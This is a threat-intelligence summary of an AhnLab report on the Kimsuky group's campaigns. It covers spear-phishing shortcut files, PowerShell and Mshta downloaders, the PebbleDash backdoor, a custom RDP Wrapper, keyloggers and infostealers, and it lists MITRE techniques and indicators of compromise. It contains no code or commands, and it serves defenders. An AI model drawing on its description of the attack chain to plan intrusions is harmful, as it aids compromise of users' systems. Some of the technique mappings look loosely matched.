Threat Research

Persistent Threats from the Kimsuky Group Using RDP Wrapper

Ahnlab
Persistent Threats from the Kimsuky Group Using RDP Wrapper

This article discusses the continued cyber attacks by the Kimsuky group, highlighting their use of various malware types, including the PebbleDash backdoor and custom RDP Wrapper. The group utilizes refined tactics such as spear-phishing with malicious shortcut files, proxy tools for external access, keyloggers, and information-stealing malware to compromise systems. The methods show an evolution from traditional backdoors to more sophisticated remote control tools. Affected: Kimsuky group, Windows operating systems, Korean users

Keypoints :

  • Kimsuky group conducts spear-phishing attacks using malicious shortcut files disguised as document files.
  • Once executed, these files initiate PowerShell or Mshta to download additional malware.
  • PebbleDash backdoor and custom RDP Wrapper are used to control infected systems.
  • RDP Wrapper bypasses limitations of remote desktop functionality in certain Windows versions.
  • Proxy malware is employed to facilitate external access to systems within private networks.
  • Keyloggers are utilized to capture user keystrokes and store them in various locations.
  • New infostealer malware extracts key values from web browsers instead of stealing credentials directly.
  • Increased usage of Loader and Injector malware indicates a shift in attack methodologies.
  • Preventative measures include verifying email senders and updating security software regularly.

MITRE Techniques :

  • Execution (T1203): Utilizing malicious LNK files to execute PowerShell scripts for further malware download.
  • Persistence (T1547.001): Using RDP Wrapper to maintain access to the infected system remotely.
  • Credential Access (T1056): Leveraging keyloggers to collect user credentials.
  • Exfiltration (T1041): Employing proxy malware to facilitate exfiltration of information from the compromised system.
  • Discovery (T1018): Gathering information on specific targets through spear-phishing emails.

Indicator of Compromise :

  • [MD5] 04e5f813da28b5975d0b6445f687bc48
  • [MD5] 26d96d40e4c8aed03d80740e1d5a4559
  • [MD5] 2ea71ff410088bbe79f28e7588a6fb47
  • [MD5] 3211ef223177310021e174c928f96bab
  • [MD5] 5565b337bfba78970b73ae65b95f2c4f
  • [IP] 216[.]219[.]87[.]41
  • [IP] 74[.]50[.]94[.]175

Full Story: https://asec.ahnlab.com/en/86098/